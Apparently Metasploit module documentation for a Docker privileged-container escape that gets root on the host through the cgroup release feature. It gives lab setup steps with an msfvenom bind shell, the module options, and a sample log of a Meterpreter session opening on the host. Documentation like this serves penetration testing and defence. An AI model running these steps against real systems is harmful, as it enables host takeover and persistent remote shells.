## Vulnerable Application Docker Privileged Container Escape that obtains root on the host machine by abusing the Linux cgroup notification on rebase feature. Both meterpreter shell and classic shell are supported. The exploit will copy a payload to a writable directory in the container and then escape the container and either search for the payload on the file system or copy it directly from the container and then execute it on the host. # Creating A Testing Environment - Install Docker - Create a privileged container (forwarding port 4444 in this example in order to use a bind shell from the host) ```bash docker run -d -it --name test-vuln-container -p 4444:4444 --privileged ubuntu ``` - Obtain a shell on the container with metasploit. One possible option is: ```bash # Create a bind shell using msfvenom msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=4444 -f elf -o ./bind4444.bin # Copy bind shell into container docker cp ./bind4444.bin test-vuln-container:/bind4444.bin # Execute bind shell in the container docker exec -it test-vuln-container /bind4444.bin ``` - Connect to this bind shell in metasploit ```bash use multi/handler set payload linux/x64/meterpreter/bind_tcp set rhost 127.0.0.1 set lport 4444 run ``` ## Verification Steps 1. `use exploit/linux/local/docker_privileged_container_escape` 2. `set SESSION [session]` 3. `set PAYLOAD [payload]` 4. `set LHOST [lhost]` 5. `set LPORT [lport]` 6. `exploit` ## Options ## PAYLOAD Set this option to choose which type of root session you want to create. ## ForceExploit Force exploit even if the current session does not appear to be in a docker container, or the container does not appear vulnerable. ## ForcePayloadSearch Force the exploit to search for the payload in the file system rather than copying out of the docker container. This avoids the need for a writable directory on the host system. Typically, the filesystem of the container will be located in the `/var/lib/docker/overlay2/` directory. ## WritableContainerDir A directory where we can write files inside the container (default is /tmp). This is needed to drop the payload into the container. ## WritableHostDir A directory where we can write files on the host (default is /tmp). This is needed to copy the payload from the container onto the host. Alternatively see ForcePayloadSearch # Scenarios ## Container Escape starting with a meterpreter shell ``` msf5 exploit(multi/handler) > use exploit/linux/local/docker_privileged_container_escape msf5 exploit(linux/local/lxc_privilege_escalation) > set session 1 session => 1 msf5 exploit(linux/local/lxc_privilege_escalation) > run [*] Started reverse TCP handler on 10.0.2.15:4444 [*] Writing payload executable to '/tmp/aLQdBKpMXLo' [*] Executing script to exploit privileged container [*] Sending stage (3012516 bytes) to 192.168.0.231 [*] Meterpreter session 4 opened (0.0.0.0:0 -> 192.168.0.231:4444) at 2020-07-19 14:50:51 +0100 ```